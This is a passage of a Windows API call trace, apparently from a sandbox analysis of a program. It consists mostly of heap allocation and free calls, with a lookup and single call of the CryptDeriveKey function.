dwFlags=0x0, lpMem=0x1458b18 | out: hHeap=0x12c0000) returned 1 [0121.146] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.146] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef920 [0121.146] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efaa0 [0121.146] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919d8 [0121.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0121.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efaa0 | out: hHeap=0x12c0000) returned 1 [0121.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef920 | out: hHeap=0x12c0000) returned 1 [0121.146] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d18 [0121.146] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9b0 [0121.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0a0 [0121.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb98 [0121.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef970 [0121.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9c0 [0121.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdc88 [0121.147] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9c0 | out: hHeap=0x12c0000) returned 1 [0121.147] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc88 | out: hHeap=0x12c0000) returned 1 [0121.147] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef970 | out: hHeap=0x12c0000) returned 1 [0121.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdbb0 [0121.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0121.148] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda90 [0121.148] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0121.148] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb80 [0121.148] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef920 [0121.148] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdc70 [0121.148] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef920 | out: hHeap=0x12c0000) returned 1 [0121.148] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda30 [0121.148] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef920 [0121.148] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda48 [0121.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef920 | out: hHeap=0x12c0000) returned 1 [0121.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdaa8 [0121.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8d0 [0121.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa00 [0121.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdc58 [0121.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0121.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc58 | out: hHeap=0x12c0000) returned 1 [0121.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8d0 | out: hHeap=0x12c0000) returned 1 [0121.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdbc8 [0121.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9a0 [0121.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdcb8 [0121.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0121.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdc28 [0121.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa30 [0121.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdca0 [0121.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0121.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdc40 [0121.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda60 [0121.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x14a3268 [0121.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0a0 | out: hHeap=0x12c0000) returned 1 [0121.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdbe0 [0121.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9f0 [0121.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9f0 | out: hHeap=0x12c0000) returned 1 [0121.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda78 [0121.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9a0 [0121.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdc88 [0121.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0121.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb38 [0121.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdc58 [0121.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdc10 [0121.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9f0 [0121.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9d0 [0121.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9f0 | out: hHeap=0x12c0000) returned 1 [0121.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdbf8 [0121.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa70 [0121.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9e8 [0121.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa70 | out: hHeap=0x12c0000) returned 1 [0121.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa50 [0121.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda00 [0121.152] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdac0 [0121.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa60 [0121.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef970 [0121.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdaf0 [0121.152] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdac0 | out: hHeap=0x12c0000) returned 1 [0121.152] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0121.152] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdaf0 | out: hHeap=0x12c0000) returned 1 [0121.152] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef970 | out: hHeap=0x12c0000) returned 1 [0121.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff460 [0121.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9a0 [0121.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdac0 [0121.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa80 [0121.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef900 [0121.153] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdaf0 [0121.153] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdac0 | out: hHeap=0x12c0000) returned 1 [0121.153] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.153] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdaf0 | out: hHeap=0x12c0000) returned 1 [0121.153] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.153] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa00 [0121.153] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb08 [0121.153] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa70 [0121.153] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef930 [0121.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdaf0 [0121.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb08 | out: hHeap=0x12c0000) returned 1 [0121.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa70 | out: hHeap=0x12c0000) returned 1 [0121.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdaf0 | out: hHeap=0x12c0000) returned 1 [0121.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef930 | out: hHeap=0x12c0000) returned 1 [0121.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef990 [0121.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb50 [0121.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa90 [0121.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef910 [0121.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdac0 [0121.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb50 | out: hHeap=0x12c0000) returned 1 [0121.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa90 | out: hHeap=0x12c0000) returned 1 [0121.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdac0 | out: hHeap=0x12c0000) returned 1 [0121.154] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef910 | out: hHeap=0x12c0000) returned 1 [0121.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa20 [0121.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdac0 [0121.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef910 [0121.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8e0 [0121.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdaf0 [0121.155] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdac0 | out: hHeap=0x12c0000) returned 1 [0121.155] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef910 | out: hHeap=0x12c0000) returned 1 [0121.155] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdaf0 | out: hHeap=0x12c0000) returned 1 [0121.155] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8e0 | out: hHeap=0x12c0000) returned 1 [0121.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa10 [0121.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdac0 [0121.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef900 [0121.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef910 [0121.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdaf0 [0121.155] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdac0 | out: hHeap=0x12c0000) returned 1 [0121.155] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.155] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdaf0 | out: hHeap=0x12c0000) returned 1 [0121.155] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef910 | out: hHeap=0x12c0000) returned 1 [0121.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb50 [0121.156] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef950 [0121.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0121.156] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xf) returned 0x14bdac0 [0121.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x14bdac0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0121.156] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdac0 | out: hHeap=0x12c0000) returned 1 [0121.157] GetProcAddress (hModule=0x77820000, lpProcName="CryptDeriveKey") returned 0x77856ad0 [0121.157] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb50 | out: hHeap=0x12c0000) returned 1 [0121.157] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef950 | out: hHeap=0x12c0000) returned 1 [0121.157] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff280 [0121.157] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa30 [0121.157] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef930 [0121.157] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efac0 [0121.157] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa60 [0121.157] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef970 [0121.157] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0121.157] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef930 | out: hHeap=0x12c0000) returned 1 [0121.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0121.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0121.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef970 | out: hHeap=0x12c0000) returned 1 [0121.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff280 | out: hHeap=0x12c0000) returned 1 [0121.158] CryptDeriveKey (in: hProv=0x148ef18, Algid=0x6610, hBaseData=0x1458ed8, dwFlags=0x1, phKey=0x7df280 | out: phKey=0x7df280*=0x1458c18) returned 1 [0121.159] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa60 [0121.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x133c9b8 [0121.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491858 [0121.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb08 [0121.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdac0 [0121.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdaf0 [0121.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efaa0 [0121.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdaf0 | out: hHeap=0x12c0000) returned 1 [0121.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efaa0 | out: hHeap=0x12c0000) returned 1 [0121.160] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdac0 | out: hHeap=0x12c0000) returned 1 [0121.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdac0 [0121.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdaf0 [0121.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb50 [0121.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef920 [0121.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb50 | out: hHeap=0x12c0000) returned 1 [0121.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef920 | out: hHeap=0x12c0000) returned 1 [0121.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdaf0 | out: hHeap=0x12c0000) returned 1 [0121.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdaf0 [0121.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb50 [0121.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdd00 [0121.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef920 [0121.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdd00 | out: hHeap=0x12c0000) returned 1 [0121.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef920 | out: hHeap=0x12c0000) returned 1 [0121.161] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb50 | out: hHeap=0x12c0000) returned 1 [0121.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb50 [0121.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdd78 [0121.161] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdce8 [0121.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa70 [0121.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdce8 | out: hHeap=0x12c0000) returned 1 [0121.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa70 | out: hHeap=0x12c0000) returned 1 [0121.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdd78 | out: hHeap=0x12c0000) returned 1 [0121.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdcd0 [0121.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bddd8 [0121.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bddc0 [0121.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef930 [0121.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bddc0 | out: hHeap=0x12c0000) returned 1 [0121.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef930 | out: hHeap=0x12c0000) returned 1 [0121.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bddd8 | out: hHeap=0x12c0000) returned 1 [0121.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bddd8 [0121.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdd18 [0121.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdd00 [0121.162] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9f0 [0121.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdd00 | out: hHeap=0x12c0000) returned 1 [0121.162] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9f0 | out: hHeap=0x12c0000) returned 1 [0121.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdd18 | out: hHeap=0x12c0000) returned 1 [0121.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0121.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0121.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef990 | out: hHeap=0x12c0000) returned 1 [0121.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0121.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa10 | out: hHeap=0x12c0000) returned 1 [0121.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff460 | out: hHeap=0x12c0000) returned 1 [0121.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda00 | out: hHeap=0x12c0000) returned 1 [0121.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa50 | out: hHeap=0x12c0000) returned 1 [0121.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb98 | out: hHeap=0x12c0000) returned 1 [0121.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda90 | out: hHeap=0x12c0000) returned 1 [0121.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdbb0 | out: hHeap=0x12c0000) returned 1 [0121.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc70 | out: hHeap=0x12c0000) returned 1 [0121.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb80 | out: hHeap=0x12c0000) returned 1 [0121.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda48 | out: hHeap=0x12c0000) returned 1 [0121.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda30 | out: hHeap=0x12c0000) returned 1 [0121.163] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdaa8 | out: hHeap=0x12c0000) returned 1 [0121.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdcb8 | out: hHeap=0x12c0000) returned 1 [0121.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdbc8 | out: hHeap=0x12c0000) returned 1 [0121.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdca0 | out: hHeap=0x12c0000) returned 1 [0121.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc28 | out: hHeap=0x12c0000) returned 1 [0121.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda60 | out: hHeap=0x12c0000) returned 1 [0121.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc40 | out: hHeap=0x12c0000) returned 1 [0121.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdbe0 | out: hHeap=0x12c0000) returned 1 [0121.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc88 | out: hHeap=0x12c0000) returned 1 [0121.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda78 | out: hHeap=0x12c0000) returned 1 [0121.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc58 | out: hHeap=0x12c0000) returned 1 [0121.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb38 | out: hHeap=0x12c0000) returned 1 [0121.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9d0 | out: hHeap=0x12c0000) returned 1 [0121.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc10 | out: hHeap=0x12c0000) returned 1 [0121.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9e8 | out: hHeap=0x12c0000) returned 1 [0121.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdbf8 | out: hHeap=0x12c0000) returned 1 [0121.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14a3268 | out: hHeap=0x12c0000) returned 1 [0121.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9b0 | out: hHeap=0x12c0000) returned 1 [0121.164] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd970 | out: hHeap=0x12c0000) returned 1 [0121.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd988 | out: hHeap=0x12c0000) returned 1 [0121.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdad8 | out: hHeap=0x12c0000) returned 1 [0121.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0121.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14be0a8 | out: hHeap=0x12c0000) returned 1 [0121.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491998 | out: hHeap=0x12c0000) returned 1 [0121.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb20 | out: 